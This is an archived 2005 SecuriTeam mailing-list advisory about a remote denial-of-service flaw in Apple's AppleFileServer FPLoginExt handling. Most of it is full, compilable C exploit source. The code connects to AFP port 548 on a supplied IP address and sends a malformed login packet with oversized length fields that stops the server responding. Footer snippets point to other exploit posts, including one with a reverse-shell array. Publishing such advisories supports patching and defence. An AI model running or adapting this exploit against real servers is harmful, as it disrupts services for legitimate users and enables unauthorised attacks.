[EXPL] AppleFileServer (AFS) FPLoginExt DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 02/14/05

Next message: SecuriTeam: "[NT] Armagetron DoS"

Previous message: SecuriTeam: "[UNIX] Perl PerlIO_Debug() Buffer Overflow (Suidperl)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 14 Feb 2005 16:00:43 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

AppleFileServer (AFS) FPLoginExt DoS
------------------------------------------------------------------------

SUMMARY

The AppleFileServer provides "Apple Filing Protocol (AFP) services for
both Mac OS X and Mac OS X server. AFP is a protocol used to remotely
mount drives, similar to NFS or SMB/CIFS". A denial of service
vulnerability exists in AFS that allows a remote attacker to cause the
server to no long respond to legitimate requests.

DETAILS

Exploit:
/* [ fm-afp.c ]
* -( nemo @ felinemenace.org )- 2005
*
* Code for afp bug found by Braden Thomas.
*
* Again hello to everyone @ irc.pulltheplug.org
*
* need a challenge? -( http://pulltheplug.org )-
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define UAMSIZE 1022
#define AFPVERSIZE 5
#define PATHSIZE 30
#define UASIZE 30
#define AFPNSIZE 5
#define AFPPORT 548
#define BUFSIZE sizeof(dsi)+sizeof(fploginext) //+LEN+sizeof(afpEnd)

typedef struct { char AFPVER[AFPVERSIZE] ;} AFPVER_T;
typedef struct { char UAM[UAMSIZE] ;} UAM_T;
typedef struct { char PATH[PATHSIZE] ;} PATH_T;
typedef struct { char UserAuthInfo[UASIZE];} UserAuth_t;
typedef struct { char AFPName[AFPNSIZE] ;} AFPName_t;

typedef struct dsi { // Data Stream Interface.
u_int8_t req;
u_int8_t com;
u_int16_t id;
u_int32_t offset;
u_int32_t len;
u_int32_t reserved;
} DSI_T;

typedef struct FPLoginExt { // Establishes a session with a server using
an
Open Directory domain.
u_int8_t command;
u_int8_t pad;
u_int16_t flags;
AFPVER_T AFPVER;
UAM_T UAM;
u_int8_t UserNameType;
AFPName_t UserName;
u_int8_t PathType;
PATH_T Pathname;
u_int8_t pad2;
UserAuth_t UserAuthInfo;
} FP_LoginExt_T;

DSI_T dsi;
FP_LoginExt_T fploginext;

void banner()
{
printf(" [ fm-afp.c ]\n");
printf("-( nemo felinemenace org )-\n\n");
}

void usage(char *progname)
{
printf("usage: %s <ip address>.\n",progname);
exit(1);
}

int connect_afp(char *ip,int *sockfd)
{
struct sockaddr_in target_addr;
int len;

*sockfd = socket(AF_INET, SOCK_STREAM, 0);

target_addr.sin_family = AF_INET;
target_addr.sin_port = htons(AFPPORT);
inet_aton(ip, &(target_addr.sin_addr));
memset(&(target_addr.sin_zero), '\0', 8);

if (connect(*sockfd, (struct sockaddr *)&target_addr, sizeof(struct
sockaddr)) == -1) {
return 1;
}
return 0;
}

void generate_packet(char *packet)
{
int n;

dsi.req = '\x00';
dsi.com = '\x02';
dsi.id = (u_int16_t)0x0002;
dsi.offset = 0x00000000;
dsi.len = 0x00000434;
dsi.reserved = 0x00000000;

fploginext.command = (u_int8_t)'\x3f';
fploginext.pad = (u_int8_t)'\x00';
fploginext.flags = (u_int16_t)0x0000;
memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5);
memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM));
fploginext.UAM.UAM[0] = '\x0f';
fploginext.UAM.UAM[1] = '\xff';
fploginext.UAM.UAM[257] = '\xff'; // size of next
string.
fploginext.UAM.UAM[258] = '\xff'; //
fploginext.UAM.UAM[500] = '\x00'; // size of next
string.
fploginext.UAM.UAM[501] = '\xf0'; //

fploginext.UserNameType = (u_int8_t)'\x11';
memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5);
fploginext.PathType = (u_int8_t)'\xff';
memcpy((char
*)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30);
fploginext.pad2 = (u_int8_t)'\xff';
memcpy((char
*)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30);

memcpy(packet, &dsi, sizeof(dsi));
packet += sizeof(dsi);
memcpy(packet, &fploginext, sizeof(fploginext));
}

int send_packet(char *packet,int *sockfd)
{
if (send(*sockfd, packet, BUFSIZE, 0) == -1) {
return 1;
}

return 0;
}

int main(int ac, char **av)
{
int sockfd;
char packet[BUFSIZE];
struct timeval time;

banner();
if(ac != 2) {
usage(*av);
}
printf("[+] Connecting to target: %s.\n",av[1]);
if(connect_afp(av[1],&sockfd)) {
printf("[-] An error has occured connecting to the
target.\n");
exit(1);
}

printf("[+] Generating malicious packet.\n");
generate_packet(packet);

printf("[+] Sending packet to target.\n");
if(send_packet(packet,&sockfd)) {
printf("[-] Error sending packet.\n");
close(sockfd);
exit(1);
}

fd_set mySet;
FD_ZERO(&mySet);
FD_SET(sockfd, &mySet);
time.tv_sec = 0;
time.tv_usec = 50;
select(sockfd+1, &mySet, NULL, NULL, &time);

close(sockfd);
return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:nemo@felinemenace.org >
nemo.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NT] Armagetron DoS"

Previous message: SecuriTeam: "[UNIX] Perl PerlIO_Debug() Buffer Overflow (Suidperl)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[NEWS] Ventrilo Denial of Service
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling
within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char
*data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
(Securiteam)
[EXPL] qwik-smtpd Format String
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... ** The second problem was "fixed"
using another char and then ... ** calling the int 0x80 syscall. ... void
Usage; ... (Securiteam)
[EXPL] mtFTPd Server Format String (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... / discovered by darkeagle
- xx.10.04 ... build_un(unsigned int retaddr, unsigned int offset, unsigned int base, ...
main(int argc, char * argv) ... (Securiteam)
[EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void put_name(char *dest,
const char *name, int pad, unsigned int ... (Securiteam)
[EXPL] Crystal FTP Pro Client LIST Proof of Concept
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char reverseshell[]
= ... void auth; ... void handle_cmd (int s, int connfd, char* ip); ...
(Securiteam)